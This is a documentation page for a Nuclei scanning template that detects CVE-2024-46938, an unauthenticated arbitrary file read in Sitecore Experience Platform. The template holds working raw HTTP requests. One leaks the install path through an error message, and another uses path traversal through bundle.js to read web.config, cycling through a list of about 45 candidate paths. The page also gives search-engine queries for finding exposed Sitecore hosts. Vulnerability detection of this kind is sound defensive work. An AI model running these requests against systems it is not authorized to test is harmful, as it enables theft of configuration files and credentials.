Skip to content
Nuclei Templates

Sitecore Experience Platform <= 10.4 - Arbitrary File Read

ID: CVE-2024-46938

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,sitecore,lfi,rce

Description

Section titled “Description”

An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.

YAML Source

Section titled “YAML Source”
id: CVE-2024-46938


info:
  name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46938
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-46938
    epss-score: 0.00087
    epss-percentile: 0.3838
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 45
    vendor: sitecore
    product: experience_commerce
    shodan-query: http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve,cve2024,sitecore,lfi,rce


flow: http(1) && http(2) && http(3)


http:
  - method: GET
    path:
      - "{{BaseURL}}/-/media/doo-doo.ashx"


    host-redirects: true
    matchers:
      - type: word
        part: location
        words:
          - "/sitecore/service/notfound.aspx"
        internal: true


  - raw:
      - |
        POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        __PAGESTATE=/../../x/x


    matchers:
      - type: word
        part: body
        words:
          - "Could not find a part of the path"
        internal: true


    extractors:
      - type: regex
        name: file_path
        group: 1
        regex:
          - Could not find a part of the path '([^']+)\\x\\x\.txt
        internal: true


  - raw:
      - |
        GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1
        Host: {{Hostname}}


    payloads:
      paths:
        - '{{file_path}}\'
        - 'C:\inetpub\wwwroot\sitecore\'
        - 'C:\inetpub\wwwroot\sitecore1\'
        - 'C:\inetpub\wwwroot\sxa\'
        - 'C:\inetpub\wwwroot\XP0.sc\'
        - 'C:\inetpub\wwwroot\Sitecore82\'
        - 'C:\inetpub\wwwroot\Sitecore81\'
        - 'C:\inetpub\wwwroot\Sitecore81u2\'
        - 'C:\inetpub\wwwroot\Sitecore7\'
        - 'C:\inetpub\wwwroot\Sitecore8\'
        - 'C:\inetpub\wwwroot\Sitecore70\'
        - 'C:\inetpub\wwwroot\Sitecore71\'
        - 'C:\inetpub\wwwroot\Sitecore72\'
        - 'C:\inetpub\wwwroot\Sitecore75\'
        - 'C:\Websites\spe.dev.local\'
        - 'C:\inetpub\wwwroot\SitecoreInstance\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_8\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_91\'
        - 'C:\inetpub\wwwroot\Sitecore9\'
        - 'C:\inetpub\wwwroot\sitecore93sc.dev.local\'
        - 'C:\inetpub\wwwroot\Sitecore81u3\'
        - 'C:\inetpub\wwwroot\sitecore9.sc\'
        - 'C:\inetpub\wwwroot\sitecore901xp0.sc\'
        - 'C:\inetpub\wwwroot\sitecore9-website\'
        - 'C:\inetpub\wwwroot\sitecore93.sc\'
        - 'C:\inetpub\wwwroot\'
        - 'C:\inetpub\{{Hostname}}.sc\'
        - 'C:\inetpub\{{FQDN}}.sc\'
        - 'C:\inetpub\{{RDN}}.sc\'
        - 'C:\inetpub\{{FQDN}}\'
        - 'C:\inetpub\{{RDN}}\'
        - 'C:\inetpub\{{Hostname}}\'
        - 'C:\inetpub\{{Hostname}}.sitecore\'
        - 'C:\inetpub\{{FQDN}}.sitecore\'
        - 'C:\inetpub\{{RDN}}.sitecore\'
        - 'C:\inetpub\{{Hostname}}.website\'
        - 'C:\inetpub\{{FQDN}}.website\'
        - 'C:\inetpub\{{RDN}}.website\'
        - 'C:\inetpub\{{Hostname}}.dev.local\'
        - 'C:\inetpub\{{FQDN}}.dev.local\'
        - 'C:\inetpub\{{RDN}}.dev.local\'
        - 'C:\inetpub\{{Hostname}}sc.dev.local\'
        - 'C:\inetpub\{{FQDN}}sc.dev.local\'
        - 'C:\inetpub\{{RDN}}sc.dev.local\'


    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<configuration>")'
          - 'contains(content_type, "text/javascript")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220696d8cc1604b9fa3c7a814839a1128a819aeb00f94f50ab5acf06a88f7ed6cb2022077849afa67ea13fe98529763d2e6fc5731d574f74a29bfba8f41c788cebecb2e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46938.yaml"

View on Github